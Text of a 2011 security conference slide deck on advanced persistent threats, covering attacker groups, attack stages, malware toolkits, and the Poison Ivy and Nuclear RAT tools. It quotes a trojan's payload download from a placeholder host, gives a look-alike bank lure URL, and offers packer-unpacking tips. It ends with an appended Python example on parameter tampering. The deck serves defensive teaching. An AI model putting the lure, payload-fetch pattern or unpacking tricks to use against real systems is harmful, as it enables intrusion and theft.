APT Hartford Oct12
10/10/2011
Advanced Persistent Threat: The Battle to p0wn Your Network
ISACA Greater Hartford Chapter, October 12, 2011
Page 1 | YYYY MM DD | CONFIDENTIAL

Agenda
• What is advanced persistent threat?
• Goals of the attacker
• Stages of APT
• Why is it hard to catch them?
• Some examples – deconstructing the hack
• Lunch/Break
• Demonstrations
• What to look for?
• How can we protect ourselves?

Assumptions
• Any hack can be used to commit an APT-style attack – as long as it is stealthy enough
• As we only have the one day:
  – Malware
  – Web exploits – SQL injection
  – Exploiting vulnerabilities in un-patched systems
  – Browser-based exploits

Who am I?
• Team Lead (Vulnerability Management & Incident Response) with Bell Aliant:
  – Penetration testing & application security assessments
  – Vulnerability research
  – Malware analysis
  – Security event monitoring / incident response
  – Computer forensic investigations
• Worked as a Senior Manager for E&Y and KPMG in Security and Forensics
• Worked for the Canadian and US DoD as well as numerous utilities and .com companies
• Speak at numerous conferences (BlackHat, DefCon, ISACA, HTCIA, Interop, SANS, etc.)

Show of Hands…
• What is your role?
• What do you want to get out of this session?
• Do you believe your organization could be a target of APT?
• On a scale of 1-10, how well do you think your A/V solution is protecting you?
Getting Scary…

APT IN DEPTH – GENERAL TRENDS

“From Espionage to Sabotage” (Enrique Salem – President/CEO, Symantec)

General Trends
• APT is becoming more public
• We continue to face challenges going forward
• We have to re-think our security models
• Unique malware continues to grow
• Government & law enforcement are “out-gunned”

General Trends
• Motivations have changed
• The rise of “hacktivism”
  – Hacking to make a political point
  – Not just web site tampering
  – Manipulating the computer and financial infrastructure of a target for political reasons is also a form of hacktivism
• The scary thing is that hackers are waging attacks for a very specific reason!
• Gone are the days of attacks based solely on the “coolness” factor or the trophy.
• There is lots of money to be had in hacking today!

According to… 45 breach cases…
• Data breaches resulting from malicious attacks and botnets were more costly and severe.
• Organizations are spending more on legal defense costs, which can be attributed to increasing fears of successful class actions resulting from customer, consumer or employee data loss.
• Average abnormal churn rates across all incidents in the study were slightly higher than last year (from 3.6 percent in 2008 to 3.7 percent in 2009); churn was measured by the loss of customers who were directly affected by the data breach event.
Source: 2010 Ponemon Institute Survey / PGP Corporation

According to… 45 breach cases…
• The most expensive data breach event included in this year's study cost a company nearly $31 million to resolve.
• The least expensive total cost of a data breach for a company included in the study was $750,000.
Source: 2010 Ponemon Institute Survey / PGP Corporation

According to… 531 respondents…
• Malware infection continued to be the most commonly seen attack, with 67.1 percent of respondents reporting it.
• Of the approximately half of respondents who experienced at least one security incident last year, fully 45.6 percent reported they’d been the subject of at least one targeted attack.
• Fewer respondents than ever are willing to share specific information about dollar losses they incurred.
Source: 2010-11 CSI Survey

According to… 531 respondents…
1. Basic attacks
  – Phishing
  – Simple port scans
  – Brute force password scans
2. Malware
  – Toolkits
  – Attacks on un-patched systems
3. Attacks 2.0
  – APT
  – 21.6% of the 2.0 attacks were considered “targeted”
Source: 2010-11 CSI Survey

What are organizations doing?

According to… Verizon…
• 92% of breaches came from external sources
• Only 17% were internal
• 50% were due to a hack – and 49% incorporated malware
Compromised records by industry group / Breaches by industry group
Source: 2011 Verizon Breach Report

APT IN DEPTH – THE FACE OF CYBERCRIME

The Face of Cybercrime

Max Butler (aka Max Vision)
• 2nd offence after serving 5 yrs for CC theft
• Created Carders Market, an underground for brokering the sale of CCs and personal information
• Sentenced to 13 yrs and ordered to pay $27.5M in restitution

Albert Gonzalez
• Aka “soupnazi”, “segvec”
• Responsible for the TJX and Heartland CC thefts
• 170M CC numbers
• Previously was an IT contractor for the US Secret Service – ironically the same people who arrested him
• Longest US sentence – 20 yrs in Federal prison
Anonymous
• Inspired by the perceived anonymity under which users post images and comments on the Internet
• Been around since 2006, but most well known recently (2010-11) for:
  – HB Gary hack
  – Operation Orlando (Universal Orlando Resort website defacement, airport + mayor website defacement)
  – BofA document release (showing corruption)
  – Operation Sony (PlayStation Network hack)
  – Operation BART (Bay Area Rapid Transit hack)

Anonymous – Very Brazen…
• “Hacker Group Anonymous Aims To Destroy Facebook on Nov. 5, 2011”
  – Due to their relationship with law enforcement

Anonymous… Operation Facebook

Lulzsec “LOLs-Sec”
• 6 core members (Sabu, Topiary, Kayla, T-Flow, Avunit, Pwnsauce)
• Does not appear to hack for financial profit
• Motivation is to have fun by causing mayhem
  – “We do things just because we find it entertaining” and that “watching the results can be priceless”.
• As well as for “hacktivism” reasons
  – When they hacked PBS, they stated they did so in retaliation for what they perceived as unfair treatment of Wikileaks in a Frontline documentary entitled WikiSecrets.
• They also claim to be drawing attention to computer security flaws and holes
  – And they are doing a great job finding them – although they are normally pretty simple flaws (i.e. SQL injection)
• Called it “quits” after 50 days on June 25, 2011

Lulzsec – They mean what they say!
Scary… tried Bill O’Reilly’s site last week – still vulnerable!

Lulzsec… still around?
Lulzsec
• FOX
• X-Factor UK
• ATM
• Sony Japan
• PBS
• InfraGard
• Porn sites
• Senate.gov
• Gaming sites

Antisec Movement
• Made up of members from Anonymous and LulzSec as well as others
• Mission to expose the governments and their contractors through the "#AntiSec" movement
  – Against security companies that use full-disclosure to profit and develop scare-tactics to convince people into buying their firewalls, anti-virus software and auditing services.
• Released 400MB of data from US government security contractor ManTech
• Much of the information appears to be related to projects that ManTech is involved in related to NATO and other security projects.

Organized Crime / Financial-led Campaigns
• Still a very common source of APT-type hacks
• The Russian Mafia made more money in online banking fraud last year than the drug cartels made selling cocaine
• An entire industry has cropped up over the years to support the theft of digital information, with players in all aspects of the marketplace.
• Hackers who stole bank account details for 200,000 Citigroup customers infiltrated the company's system by exploiting a garden-variety security hole in the company's website for credit card users.

State Sponsored
• DigiNotar (2011)
  – Apparently conducted by Iran
  – Theory was the attack was "used to spy on Iranian Internet users on a large scale."
• Stuxnet (2010)
  – US/Israel responsible for attack on Iran?
• Google / Operation Aurora (2010)
  – Attempted theft of Gmail accounts by the Chinese (including those of senior US government officials, Chinese activists and others from S. Korea)
  – Attacks from Jinan – home to one of six technical reconnaissance bureaus belonging to the People's Liberation Army and a technical college U.S.
investigators last year linked to a previous attack on Google.
• International Monetary Fund (IMF) Hack (2011)
  – Hacker installed software on a single computer that sent scam e-mails to specific victims
  – The sophisticated nature of the attack and the resources required to execute it indicate a nation-state was involved

State Sponsored
• China’s Underground (NY Times – Majia Interview)
• “There are the intelligence-oriented hackers inside the People’s Liberation Army, as well as more shadowy groups that are believed to work with the state government.”
• “Computer hacking has become something of a national sport… There are hacker conferences, hacker training academies and magazines.”

State Sponsored
• “Microsoft and Adobe have a lot of zero days,” he said, while scanning Web sites at home. “But we don’t publish them. We want to save them so that some day we can use them.”
• When asked whether hackers work for the government, or the military, he says “yes.”

APT IN DEPTH – CYBERCRIME IS EVOLVING

Cybercrime is Evolving
• Vulnerability discoverers most important & SW/HW vendors introducing vulnerabilities – no vulnerabilities, no hack, no breach.
• Eliminates 99% of the rest of the cybercrime world
Source: Stuart McClure – McAfee

Cybercrime is Evolving
Source: Stuart McClure – McAfee

Target Has Evolved
Different issues then!
Vehicles have changed etc…

Rising Tide of Cyber Espionage

Wide Range of Victims

Browser Continues to be the Target

High Profile Attacks Increasingly Common

The Evolving Threat Landscape
• # of threats are up 5X
• Nature of threats changing
  – From broad, scattershot to focused, targeted
• Pace of advanced attacks accelerating
• High profile attacks commonplace
  – Citicorp, Sony, Epsilon, RSA, Adobe, Morgan Stanley, Lockheed, L-3, PBS, Google…

Hacktivism
• Wikipedia – “The nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends.”
• What should or should not be in the world…
• Many techniques used by hacktivists:
  – Defacements
  – Redirects
  – DoS
  – Data theft
  – Web site parodies

Items that Have Caused our Demise…
• Too much reliance on antivirus
• Social networking + third party apps
• “Trusting” all our outbound traffic
• Sloppy perimeter security
• Specialized malware
• URL-shortening services = phisher’s best friend
• BitTorrent
• Improved stealth botnets

We’re Doomed…
Source: 2010-11 CSI Survey

The Malware Problem…
• Malware is difficult to deal with
• Exponential growth
• Lots are packed and encrypted – hard to automate analysis or blacklist
• And therefore the medium of choice for attackers!

Malware Samples by Month
Steady increase month-to-month since start of 2010…
Source: McAfee 2011 Q2 Threat Report

2011 Q2 – Total Malware Samples
Steady climb… 22% increase over 2010. On track to 75M samples by EOY!
Source: McAfee 2011 Q2 Threat Report

2011 Q2 – Unique Fake-Alert Samples
Steady growth again – malware of choice
Source: McAfee 2011 Q2 Threat Report

2011 Q2 – Fake-AV Samples for Apple
Development of this malware is due to the increase of Apple for business use. iPad or iPhone malware is a case of “when” not “if”!
Source: McAfee 2011 Q2 Threat Report

2011 Q2 – Evil URLs – Delivering Malware – Source
Source: McAfee 2011 Q2 Threat Report

2011 Q2 – Evil URLs – Delivering Malware
Source: McAfee 2011 Q2 Threat Report

How malware is bypassing security technology
• Target browser & plug-in vulnerabilities
• Zero-day exploits
• Obfuscated JavaScript
• Polymorphic payloads
• Frequently changing, dynamic domain names
• Encrypted communications
• Compromise legitimate Web sites
• Social engineering

APT IN DEPTH – WHAT IS AN APT?

Introduction
• APT is really a “flashy term” vendors and the like are using to categorize attacks that I refer to as a “targeted attack”.
• Term coined by the USAF in 2006
• That is to say, as opposed to attacks that are considered “crimes of opportunity”, these attacks are very well thought out, based on a specific goal.

Introduction
• The use of the acronym APT:
  – Advanced – The attacker is much more skilled, experienced, highly organized and usually funded when conducting an APT campaign.
  – Persistent – These are not crimes of opportunity. Focus is on gaining long term control of an organization's network & data. Attackers maintain the level of interaction needed to execute their objectives (i.e. backdoors).
  – Threat – The attacker is conducting this campaign based on a very specific goal – this is not like malware that has no real purpose (but to be annoying); they are after something specific (i.e. IP, access to your network, etc.)

Motive of the Attacker
• Political and/or military objective
  – Suppress government (i.e. “Hacktivism”)
• Economic objective
  – Stealing something of value – intellectual property
• Technical (i.e. contractors) objective
  – They need to hack you as part of a larger goal (i.e. RSA attack to get SecurID information, source code, etc.)
• Critical infrastructure such as power grid, water supply, telecom SCADA (i.e. Stuxnet)

What is an APT?
• Many make the mistake of thinking attacks are transient – that they come and go
• Attackers want to take advantage of economy of scale and break into as many places as possible, as quickly as possible.
• Therefore the tool of choice of an attacker is automation.
• Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break in very quickly

What is an APT?
• Old school attacks were about giving the victim some visible indication of a compromise.
• Today it is all about not getting caught.
• Stealth and being covert are the main goals of today’s attacks.
• The goal of these attacks is to look as close to (if not identical to) legitimate traffic as possible. The difference is so minor that many security devices cannot differentiate between them.

What is an APT?
• Attack’s goal is to provide some significant benefit to the attacker (i.e. economic, political, financial gain).
• Focus will be all about the data.
• Anything that has value to an organization means it will have value to an attacker.
• Data has become portable, and with the increasing popularity of cloud computing it is now available through the Internet.

What is an APT?
• Attackers do not just want to get in and leave, they want long term access.
• If someone is going to spend effort breaking in to an organization, they will make sure they can keep that access for a long period of time.
• Stealing data once has value, but stealing data for nine months gives the attacker even more payoff.

What is an APT?
• Advanced nations are under constant cyber attack. This is not a future threat, this is now. This has been going on for YEARS.
• Cyber “Cartels” are rapidly growing to surpass drug cartels in their impact on global security
  – The scope of finance will surpass drug cartels
  – The extent of the operation internationally

What is an APT?

What is an APT?
• MI5 says the Chinese government “represents one of the most significant espionage threats”

APT IN DEPTH – WHY IS IT SO HARD TO CATCH THEM?

Why is it hard to catch them?
• Hard to catch a moving target – we see attempts from different IPs and they change very frequently
• Inability to detect “low and slow” attacks
  – Non-predictable traffic patterns
• Hard to detect “bad” traffic when it is in plain sight – HTTP, HTTPS

Why is it hard to catch them?
• Organizations have such a large footprint infrastructure-wise that they cannot secure and keep secure every last area
• Weak web application security
• Lack of monitoring controls – people don’t know data is missing (until it is up on “pastebin”)
• Blocking against zero day
• Lack of education in organizations
  – Spear phishing

Zero-day threats
• 4 times more zero day threats than in 2010
• Vulnerabilities in systems and applications that the vendor is unaware of
• They do exist, and someone out there knows about them
• Used in APTs to breach organizations’ networks that are otherwise very secure

APT IN DEPTH – ANATOMY OF AN APT

Step 1 – Reconnaissance
• Attackers will watch and take notes on who in an organization they need to target, from administrative assistants to executives.
• Much of this information is gleaned from public Web sites, DNS recon, etc.
• Map org chart (identify attack targets)
• Social reconnaissance (acquire email, IM, etc.)
• Recruit, blackmail insiders

Step 2 – Initial Breach
• They will use spear-phishing attacks to send those identified targets an attachment with an exploit that can be used to hijack the target's system (malicious PDF, DOC, etc. w/shellcode)
• Any personal information the attacker knows about the source will be used to entice the target user to open the attachment.
• Candy drops around the building (thumb drives, DVDs)
• Gain physical access (impersonate cleaning crew, etc.)

Step 3 – Establish Covert Backdoor
• Gain elevated user privileges
• Laterally move within network & establish backdoors
• Inject additional malware
• Install rootkits, RATs, etc.
Step 4 – Establish C&C Infrastructure
• Grab credentials and use these to log on to end point systems, and siphon data.
• Now the network is being peppered with backdoors, tools to grab passwords, steal emails, and footprint the network
• Establish encrypted SSL tunnel – covert channel

Step 5 – Complete Objectives/Exfiltrate
• Exfiltrate intellectual property, trade secrets, data
• Imagine anything from financial data, marketing plans, research and development information – and transferring that information to an external server under the attacker's control
• Install Trojans in source code
• Control critical systems

Step 6 – Maintain Persistence
• Revamp malware to avoid detection
• Utilize other attack methods to maintain presence
• Continue monitoring networks, users, data

Step 7 – Public Distribution (optional)

Anatomy of an APT – MALWARE, BOTNETS AND RATS… OH MY!

Malware Goal
• All malware basically does the same stuff
  – Compromise a machine undetected
  – Gain complete control
  – Identify & acquire “target” information
  – Attempt exfiltration of information
  – Remain undetected – until target info is acquired + as long as possible

Infection Lifecycle of a Typical Botnet

Malware Facts…
• APT Malware:
  – Average file size: 121.85 KB
• Most common APT filenames:
  – svchost.exe (most common)
  – iexplore.exe
  – iprinp.dll
  – wiinzf32.dll
• APT malware avoids anomaly detection through:
  – Outbound HTTP connections
  – Process injection
  – Service persistence
• APT malware communication:
  – 100% of APT backdoors made only outbound connections
  – 83% used TCP port 80 or 443
  – 17% used another port

Malware Evasion Tactics
• Common techniques:
  – Compression
  – Obfuscation
  – Polymorphism
  – Internal encryption
  – Stealth tactics
  – Dynamic memory residence
  – Armoring
  – Anti-debugging code
  – Kernel alterations

Defining Advanced Malware
• We can see the evolution
• Next generation of threats
  – Unknown
  – Targeted
  – Polymorphic
  – Dynamic
  – Personalized
• Leverage zero-day vulnerabilities, commercial quality toolkits, social engineering tactics
• Often targets IP, credentials or other networked assets

Conventional vs. Modern, APT Malware
• Conventional malware
  – Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication
  – Examples: malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
  – Detectable through a variety of technologies/tactics: NetWitness/Solera, EnVision/ArcSight/Splunk, NIDS
  – Port scanning, high Windows port activity, non-HTTP over port 80, non-web traffic, etc.

Conventional vs.
Modern, APT Malware
• Modern-ish malware
  – Characterized by infecting via browser-based exploits
  – Exploit channel: PDF, Flash, IE/Firefox, QuickTime
  – C&C callback over HTTP(S)
  – Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye
  – Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed

Collapse of Current Technologies
• AV (Symantec, McAfee, Trend) bypassed by
  – Dynamic zero-day malware
  – Targeted attacks
  – Polymorphic malware
• URL filtering (Cisco, Blue Coat, WebSense) bypassed by
  – Dynamic domain names & URLs
  – Compromised legitimate Web sites
  – Spear phishing with embedded URLs
• IPS (Cisco, McAfee, TippingPoint, SourceFire) bypassed
  – Signatures for reactive threats
  – Heuristics are too noisy – high FP/FN rate
  – Can’t stop targeted malware

What About AV?
“Even after 30 days, many AV vendors cannot detect known attacks, making it critical for enterprises to take a more proactive approach to online security in order to minimize the potential for infection.” – Panos Anastassiadis (COO, Cyveillance)

Malware Can Defeat Sophisticated Defenses – Encryption
• Just because your laptops and critical data may be encrypted doesn’t mean your enterprise is more secure than before
  – If you can access your laptop’s encrypted data, then that means…
  – …so too can a Trojan horse which borrows your Windows logon credentials
• Trojans enable knowledgeable hackers to bypass both strong encryption and sophisticated defenses alike in order to steal sensitive data.

New Direction for Malware
• Malicious code used in APT attacks is usually:
  – Not “sexy” – the simple techniques work well!
  – To some extent, custom
    • Not widely disseminated = not picked up by AV
    • Not necessarily custom code but custom “packaging”
  – Highly targeted
    • Mostly a factor of the delivery mechanism: spear-phishing email, web link, etc.
  – Modular
    • Monolithic binary is risky; reveals too much about the MO and capabilities of the attacker

Modular… what’s that?
• Historically your neighborhood script kiddie had one of two choices for his exploitation tools:
  – The Unix way: a lot of tools, each one does a certain function very, very well
  – The Microsoft Word way: one tool to rule them all, contains all the functionality plus the kitchen sink
• However both of these techniques have drawbacks
  – The Unix way inevitably leads to tools that have vastly different interfaces, difficult learning curve
  – The Word way helps ensure a consistent interface but exposes all of your capabilities at once to the malware analyst

Modular Implants vs. Memory Analysis
• These modular implants pose a significant challenge to the incident responder
  – No longer is the entire binary (or binaries) available for viewing and analysis from the disk
  – Now we must fuse together the results of traditional malware analysis with the volatile data acquisition
• Malware authors will continue to improve in this arena
  – Freeing unused memory as soon as it is no longer necessary
  – Zeroing out sensitive memory areas after use
• Will need more research and development to keep pace with the malicious code authors!

APT IN DEPTH – FORMS OF MALWARE

Rogueware
• Rogue security software (i.e.
FakeAV)
• 35M computers infected every month with a form of rogueware
• Many victims pay for these programs, $50-$70, and stats show the bad guys are making upwards of $34M a month with this scam
• Many are fake anti-virus scanners

Rogueware

Rogueware

Twitter / Facebook
• Koobface
  – Links to malicious websites in Twitter & FB
  – Linked to sites that would install malware
  – Message to, e.g., view a video – Flash Player update needed = malware

The Risks: Koobface in Action

The Risks: Koobface in Action
Less than 10 minutes later!

Movie Anyone?
• Torrent download
• Need a codec
• Download the codec, and your machine is infected
• Your .rar archive is password protected; go to this link for the password.

Adobe Zero Day
• Exploits in Flash, Acrobat = cross platform
• Open a PDF that has bad shellcode in it with a vulnerable version of Reader
• Forced to release out-of-band patches
• In 2010 McAfee Labs counted 214,992 pieces of malware aimed at vulnerabilities in Adobe Acrobat and Reader.
• In contrast, only 2,227 malware samples attacked vulnerabilities in Microsoft Office products.
• Still lots of organizations with old versions out there

Adobe Zero Day
• Example – TROJ_PIDIEF.WX (CVE-2009-0927)
  – The PDF document contains heavily encrypted JavaScript which has a malicious shellcode.
  – Downloads a malicious file from the site http://xxxx.com/geed/geed.exe

Adobe Zero Day
• “I have deployed a newer version… no problem!”
  – End user grabs a copy of Adobe Acrobat (only licensed version I have is v7.0) or user installs scanner software package…
  – End user installs this – old version of Reader installed along with Writer

AutoRun (USB)
• Made popular by Conficker
• Use of autorun.inf to change the options
• Attackers manipulate the options in the popup
• Better with Windows 7

Password Stealing Trojans (i.e. Zeus)
• Targeted mostly financial organizations
• Big hit on BofA in 2010
• Keystroke monitoring trojan

Remote Access Tools (RATs)
• Poison Ivy, Nuclear RAT, etc.
• Provide remote access to systems
• Remote registry, screen grab, keystroke log, CMD shell, shutdown, file viewer, etc.

DNS Hijack Malware
• Resets your DNS server settings
• Points you to an attacker’s DNS server
• Resolves common sites (i.e.
Google.com) to the attacker's address
• Download malware from there
• Lots of organizations do not block outbound DNS resolution
• Becoming popular with Apple products

APT IN DEPTH – MALWARE DISTRIBUTION

Booby Trapped Documents
Source: 2010 Greg Hoglund

Drive-by Malware (Web-based Attack)
Source: 2010 Greg Hoglund

Trap Postings
Source: 2010 Greg Hoglund

Trap Postings
Source: 2010 Greg Hoglund

SQL Injection
Source: 2010 Greg Hoglund

Reflected Injection (XSS)
Source: 2010 Greg Hoglund

Three Step Infection
Source: 2010 Greg Hoglund

Payload Server
• A machine that has the actual malware dropper ready for download
• The exploit server will redirect the victim to download a binary from this location
Source: 2010 Greg Hoglund

APT IN DEPTH – MALWARE TOOLKITS

Malware Toolkits
• Those that don’t want to sell malware sell the means to help build malware:
  – ZoPack
  – El-Fiesta
  – IcePack
  – Neosploit
  – AdPack
  – Zeus
  – SpyEye
  – Tornado
  – Eleonore
  – Dragon Pack
  – Bleeding Life

Malware Toolkit Example – IcePack
• Old-ish, but a classic example
• According to the toolkit creator, the exploitation rate of this toolkit in 2009 was 50% for Russian visitors and 20% for all visitors. He asks for $400 for the toolkit.
Malware Toolkit Example – IcePack
• Builds malware to take advantage of:
  – MDAC – CVE-2006-0003
  – Windows Media Player plug-in for Firefox and Opera – CVE-2006-0005
  – WebViewFolderIcon ActiveX – CVE-2006-3730
  – VML – CVE-2006-4868
  – WinZip FileView ActiveX – CVE-2006-6884
  – QuickTime RTSP – CVE-2007-0015

Malware Toolkits – Zeus
Nice user-friendly interface ☺

Malware Toolkits – Zeus Trojan
• 55% of Zeus-infected systems had up-to-date AV
• User-friendly
• Attacker can search collected data for cookies, files, contents of HTTP requests, FTP logons, etc.
• The files collected by Zeus were typically stored on compromised servers
• Sold for as low as $250 (with support!)
• One variant had C&C running on Amazon’s EC2 cloud

Malware Toolkit Example – SpyEye
• Very similar to Zeus, but not as advanced
• Botnet toolkit
• $500 USD
• Invisible as a service, in the registry and files
• Captures data from IE and Firefox

Malware Toolkits
• Sites dedicated to exchanging malware
• Tips/tricks on developing malware
• Many of these sites are maintained by the Russians

Zeus source code for the latest version 2.0.8.9 for $100k in 2010!
Eleonore (exploit pack)
• PDF pack
– Brand new PDF Exploit (12/2009)
– PDF collab.getIcon (4/2009)
– PDF Util.Printf (11/2008)
– PDF collab.collectEmailInfo (2/2008)
• MS Internet Explorer Exploits
– MS09-002 (Internet Explorer 7 exploit, 1/2009)
– MDAC – ActiveX (Internet Explorer exploit, 3/2007)
• Java
– Javad0 (12/2008)
– Java Calendar (Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier)
• Firefox
– compareTo – exploit for a Firefox vulnerability from 2005
– jno – exploit for Firefox version 1.5.x (2006)

Tornado (exploit pack)

Dragon Pack

Bleeding Life

APT in Depth: COMMAND & CONTROL

Command & Control (2010 Greg Hoglund)

Command & Control
• Command-and-control systems
– Custom protocols (like Aurora)
– Plain old URLs
– IRC (not as common anymore)
– Stealth / embedded in legit traffic
• Machine identification
– Store infections in a back-end SQL database

Command & Control
• IRC C&C
• IRC control channel for a DDoS botnet
• Most of the C&C has moved to the web

Command & Control

Staging Server
• A place to store all the stolen goods before it gets "exfiltrated"
– Data is moved off the network in a variety of ways
(2010 Greg Hoglund)

Drop Site
• Sometimes the stolen data is moved to a tertiary system, not the same as the C&C.
(2010 Greg Hoglund)

APT in Depth: REMOTE ACCESS TOOLS (RAT)

RATs
• Also known as "Implants"
– The "persistent" backdoor program
– Hide in plain sight strategy
– General purpose hacking tool
– Stealth capabilities
– In-field update capabilities

RATs
• According to Wikipedia: A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:
– Screen/camera capture or control
– File management (download/upload/execute/etc.)
– Shell control (usually piped from command prompt)
– Computer control (power off/on/log off)
– Registry management (query/add/delete/modify)
– Other product-specific functions
• Watch out for terminology: server is the remote part, client is the GUI C&C part

RATs
• Many Chinese hacker websites offer these tools for download, including links to reduh, WebShell, ASPXSpy, etc., plus exploits and zero-day malware.

RATs
• Nuclear RAT
• Gh0st RAT
• Bifrost Remote Controller
• Poison Ivy

Poison Ivy
• Polymorphic encryption
• Polymorphic decryption routine
• Add unique tricks to bypass sandbox and memory scan

Poison Ivy

Poison Ivy
A 7kb file? Probably not much in there… but let's try anyway.
Poison Ivy RAT
• Free for download at www.poisonivy-rat.com
• The license says you can order a special, undetected version
• It also says that updating to a new version is very easy because the remote part does not need to be updated

Poison Ivy RAT
• In the Poison Ivy naming convention (other RATs as well), the client is the GUI console and the server is the remote agent sitting in the infected computer

Poison Ivy - Server
• Generated from within the client with user supplied options (IP to connect, password etc.)
• Very small: around 6 kb of code (position independent), all the rest sent on-demand from the client
• Hides very well in the system: I've seen behavioral tools failing to detect it because they couldn't recognize the API calls
• Generate options include:
– Password when authenticating with the client
– IP address to connect to
– Whether it starts at boot or not
– Where to drop the EXE
– Whether to perform the code injection, etc., etc.
Poison Ivy - Server

Poison Ivy – The Client
• Its capabilities include:
– File manager
– File shredder
– Registry manipulator
– Process viewer and manipulator
– Services and driver viewer
– TCP/IP relay proxy
– Active connection and port lister
– Remote cmd.exe shell
– Password dumper
– Key logger
– Screen and audio capture
– Internet camera capture
– Has a plugin architecture that allows writing more

Poison Ivy – Network
• Site says it uses Camellia encryption
• Challenge-response authentication: the first 256 random bytes are a challenge, the client sends the response and the server verifies if the client knows the password
• The encryption is not well implemented; reseeding the crypto with each transmission

Poison Ivy – Network
• The encryption routines can be spotted by seeing a lot of arithmetic operations
• By tracing how these functions work, we can locate the password – very important

Poison Ivy – Obfuscating the Code
• Distributed obfuscated by ExeStealth v2.7x, as identified by DiE.exe (Detect-It-Easy); PEiD failed to detect it
• The code is written in Borland Delphi
• The packer performs anti-debugging tricks such as spaghetti jumps, jumping to the middle of an instruction, checking "BeingDebugged" flags, calculating the CRC over its own code
• There is an easy trick to unpack this: after the first Access Violation exception, place the breakpoint on the CODE section – the next break will be the OEP
• We need to hide the debugger; PhantOm for Olly is ok!
• The final step is to use Import Reconstructor with the appropriate plugin to rebuild the exe

Demo of Poison Ivy
• The trick to PI is distribution of the "server" side of the trojan
• bank0famerica.com/login/downloadreport.exe
• Let's have a look…

Nuclear RAT
• Developed by the "Nuclear Winter Crew"
• The server component (217,600 bytes) is dropped under the Windows, System32, or Program Files folders, under a custom named folder; the default is NR.
• Once the server component is run, it tries to connect to its client, which listens for incoming connections on a configurable port, to allow the attacker to execute arbitrary code from his or her computer.

Nuclear RAT - Capabilities
• Take screenshots
• View webcam shots
• Capturing key strokes from the keyboard
• General information about computer (Username, Timezone, Version installed, Language, Available drives, etc.)
• Mouse control
• Remote BAT/VBS script execution
• Monitor resolution
• File Manager (Download files and folders, Delete, Upload, Execute, Rename, Copy, Set Attributes, Create Folder, etc.)
• Window Manager (Hide, show, close, minimize/maximize, disable/enable X, rename caption, send keys, etc.)
• Process Manager (kill, unload DLL, list DLLs)
• Registry Manager (Create key, edit values REG_DWORD, REG_BINARY, REG_MULTI_SZ, REG_SZ, create values, rename values)
• Clipboard manager
• Plugins manager (to add extra functionality to the malware)
• Shutdown computer
• Message Box
• Chat with infected machine
• Web downloader
• IP Scanner
• Port redirect
• TCP tunnel
• HTTP Web server
• Shell console

Nuclear RAT
• Is detectable by A/V
• Not as polymorphic as Poison Ivy
• Also known as
– Backdoor.Delf.jl
– Backdoor.Delf.jw
– Backdoor.Win32.Nuclear.b
– Win-Trojan/NucRAT
– Win-Trojan:NucRAT
– Win32/Nuclear.AG
– Backdoor.Win32.Nuclear.ak

Demo of Nuclear Rat
• The trick to NR, as with PI, is distribution of the "server" side of the trojan
• bank0famerica.com/login/downloadreport.exe
• Let's have a look…

APT in Depth: WEB APPLICATIONS: SQL INJECTION

Un-validated User Input
• Most commonly found vulnerability & most used in APT attacks involving web apps. User input that is entered via the browser is automatically trusted by the server to be correct & logical
• Little to no validation performed by server code to determine whether or not the input supplied was valid
• Ensure that the application accepts known, good input & verifies the supplied input at every instance it is received

Parameter Tampering
• Parameter Tampering
– Attack directed towards business logic within the application
– Attack that takes advantage of programmers' use of hidden or fixed form fields as a security measure

Parameter Tampering
• Let's use the example of an online store
– Price information is stored in a hidden HTML field with an assigned dollar value
– Assumption: hidden field won't be edited
– Attacker edits $ value of product in HTML
– Attacker submits altered web page with new "price"
– This is still widespread in many web stores

Parameter Tampering
What if we changed the price from $274.85 to $2.74?
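The hidden-price-field scenario above, as an added example (not from the slides): a handler that bills whatever the client says the price is, beside one that takes only the product id and quantity from the form and prices the order from its own catalog, refusing a form whose hidden price disagrees. The catalog, field names and handler functions are assumed for illustration.

```python
"""Parameter tampering: billing from a hidden price field versus a server-side lookup.

Added example, not from the original slides. The catalog, form field names and
handler functions are constructed for illustration.
"""
from decimal import Decimal, InvalidOperation

# Constructed catalog: the server's authoritative prices (the slide's $274.85 item).
CATALOG = {
    "SKU-1001": {"name": "Docking station", "price": Decimal("274.85")},
    "SKU-1002": {"name": "USB headset", "price": Decimal("39.99")},
}


class TamperedRequest(ValueError):
    """Raised when a client-supplied value fails validation or disagrees with the server."""


def checkout_trusting_hidden_field(form: dict) -> Decimal:
    """The slide's vulnerable pattern: the hidden 'price' field is taken as-is.
    Rewriting 274.85 to 2.74 in a proxy means the server bills 2.74."""
    qty = int(form["qty"])
    price = Decimal(form["price"])       # client-controlled value
    return price * qty


def checkout_server_side_price(form: dict) -> Decimal:
    """Hardened pattern: the client only chooses *which* product and how many.
    The price comes from the catalog. A hidden price field that disagrees with
    the catalog is treated as tampering and the order is refused, not repriced."""
    sku = form.get("product_id", "")
    if sku not in CATALOG:                              # allow-list of known products
        raise TamperedRequest(f"unknown product {sku!r}")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise TamperedRequest("qty is not an integer")
    if not 1 <= qty <= 99:                              # business-rule bound on quantity
        raise TamperedRequest(f"qty {qty} out of range")
    price = CATALOG[sku]["price"]
    if "price" in form:                                 # legacy template still sends it
        try:
            client_price = Decimal(form["price"])
        except InvalidOperation:
            raise TamperedRequest("price is not a number")
        if client_price != price:
            raise TamperedRequest(
                f"price mismatch for {sku}: client sent {client_price}, catalog has {price}")
    return price * qty


def safe_checkout(form: dict):
    """Turn the exception into an (accepted, detail) pair, the shape a web handler
    would log: rejected orders are the tampering attempts worth alerting on."""
    try:
        return True, str(checkout_server_side_price(form))
    except TamperedRequest as e:
        return False, str(e)


# Constructed requests: the honest form, and the same form after editing the hidden field.
HONEST_FORM = {"product_id": "SKU-1001", "qty": "1", "price": "274.85"}
TAMPERED_FORM = {"product_id": "SKU-1001", "qty": "1", "price": "2.74"}

if __name__ == "__main__":
    print("vulnerable handler bills:", checkout_trusting_hidden_field(TAMPERED_FORM))  # 2.74
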